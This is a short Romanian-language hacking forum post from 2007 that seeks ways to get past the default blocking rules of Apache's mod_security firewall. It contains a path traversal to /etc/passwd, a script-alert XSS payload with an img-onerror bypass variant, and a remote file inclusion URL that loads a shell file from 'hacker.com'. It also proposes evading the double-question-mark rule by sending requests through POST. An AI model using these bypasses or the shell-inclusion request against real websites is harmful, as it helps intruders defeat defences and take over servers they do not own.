moubik Posted December 12, 2007 Report Share Posted December 12, 2007 nu am configurat niciodata un mod_secure pentru apache. din cate am citit, i se creaza niste reguli pe baza carora blocheaza request-urile.as vrea sa facem o lista cu ce blocheaza de obicei (lista default), si cum sa trecem de acestea.cand blocheaza mod_secure apare o pagina in genul acesta:Not AcceptableAn appropriate representation of the requested resource / could not be found on this server.Apache/1.3.37 Server at www.site.com Port 80blocheaza:-request-rile /etc/passwd si toate de genul ../../../etc/passwd - nu stiu cum sa bypass asta- <script>alert(1)</script># se poate face bypass cu <img=http:// onerror="alert(1)">-daca sunt 2 "?" in urlstim ca asta apare atunci cand incercam sa facem un rfi, si astfel url-ul arata in genul:http://www.vulnerable.com/index.php?page=http://hacker.com/shell.txt?# asteia ii fac bypass cu un script php ce foloseste doar POST, in loc de GET Quote Link to comment Share on other sites More sharing options...
